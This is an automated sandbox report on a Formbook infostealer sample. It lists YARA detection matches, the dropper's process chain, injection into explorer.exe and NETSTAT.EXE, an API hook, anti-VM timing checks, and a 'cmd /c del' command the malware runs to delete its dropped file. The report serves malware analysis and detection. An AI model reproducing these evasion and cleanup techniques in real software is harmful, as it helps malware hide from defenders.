          Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: kmhbvf.exe PID: 4820, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: kmhbvf.exe PID: 5280, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: NETSTAT.EXE PID: 2304, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\shedfam.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040324F
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F35778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_00F35778
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: String function: 00EF8B30 appears 58 times
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: String function: 00EE1A36 appears 46 times
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: String function: 00EF0D17 appears 77 times
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: String function: 00EF9FA5 appears 32 times
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: String function: 00EE1CB6 appears 31 times
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: String function: 00F01B70 appears 39 times
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_0041A360 NtCreateFile,2_2_0041A360
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_0041A410 NtReadFile,2_2_0041A410
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_0041A490 NtClose,2_2_0041A490
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_0041A540 NtAllocateVirtualMemory,2_2_0041A540
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_0041A35B NtCreateFile,2_2_0041A35B
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_0041A40A NtReadFile,2_2_0041A40A
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_0041A48B NtClose,2_2_0041A48B
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F342D5: CreateFileW,DeviceIoControl,CloseHandle,1_2_00F342D5
          Source: shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs shedfam.exe
          Source: shedfam.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/5@3/2
          Source: C:\Users\user\Desktop\shedfam.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F3A6AD GetLastError,FormatMessageW,1_2_00F3A6AD
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F3443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,1_2_00F3443D
          Source: C:\Users\user\Desktop\shedfam.exeFile read: C:\Users\user\Desktop\shedfam.exeJump to behavior
          Source: C:\Users\user\Desktop\shedfam.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\shedfam.exe C:\Users\user\Desktop\shedfam.exe
          Source: C:\Users\user\Desktop\shedfam.exeProcess created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeProcess created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\kmhbvf.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\shedfam.exeProcess created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeProcess created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\kmhbvf.exe"Jump to behavior
          Source: C:\Users\user\Desktop\shedfam.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F28DE9 AdjustTokenPrivileges,CloseHandle,1_2_00F28DE9
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F29399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_00F29399
          Source: C:\Users\user\Desktop\shedfam.exeFile created: C:\Users\user\AppData\Local\Temp\nse13E8.tmpJump to behavior
          Source: C:\Users\user\Desktop\shedfam.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
          Source: C:\Users\user\Desktop\shedfam.exeCode function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004043F5
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F34148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,1_2_00F34148
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: netstat.pdbGCTL source: kmhbvf.exe, 00000002.00000003.355015355.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.361850298.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362477372.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362621598.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: netstat.pdb source: kmhbvf.exe, 00000002.00000003.355015355.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.361850298.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362477372.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362621598.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: kmhbvf.exe, 00000001.00000003.252395367.0000000004060000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000003.250969240.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.255494479.0000000001376000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.253039833.00000000011DA000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.364247640.000000000162F000.00000040.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362902921.0000000001510000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.363419936.000000000060B000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.357565507.000000000034F000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: kmhbvf.exe, 00000001.00000003.252395367.0000000004060000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000003.250969240.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.255494479.0000000001376000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.253039833.00000000011DA000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.364247640.000000000162F000.00000040.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362902921.0000000001510000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.363419936.000000000060B000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.357565507.000000000034F000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EF8B75 push ecx; ret 1_2_00EF8B88
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_0041693E push ebp; ret 2_2_0041693F
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_0040D308 push FFFFFF90h; iretd 2_2_0040D30D
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_0041D4B5 push eax; ret 2_2_0041D508
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_0041D56C push eax; ret 2_2_0041D572
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_0041D502 push eax; ret 2_2_0041D508
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_0041D50B push eax; ret 2_2_0041D572
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00EF8B75 push ecx; ret 2_2_00EF8B88
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F4C6D9 LoadLibraryA,GetProcAddress,1_2_00F4C6D9
          Source: C:\Users\user\Desktop\shedfam.exeFile created: C:\Users\user\AppData\Local\Temp\kmhbvf.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE7
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F559B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_00F559B3
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EE5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00EE5EDA
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00EE5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00EE5EDA
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EF33B7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00EF33B7
          Source: C:\Users\user\Desktop\shedfam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000002F19904 second address: 0000000002F1990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000002F19B7E second address: 0000000002F19B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-99351
          Source: C:\Windows\explorer.exe TID: 6016Thread sleep time: -32000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 5356Thread sleep time: -32000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-100241
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeAPI coverage: 4.3 %
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeAPI coverage: 1.4 %
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_1-98249
          Source: C:\Users\user\Desktop\shedfam.exeAPI call chain: ExitProcess graph end nodegraph_0-3335
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeAPI call chain: ExitProcess graph end nodegraph_1-98383
          Source: explorer.exe, 00000003.00000000.331131517.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
          Source: explorer.exe, 00000003.00000000.266277554.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000003.00000000.331131517.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.271013770.0000000008FD3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
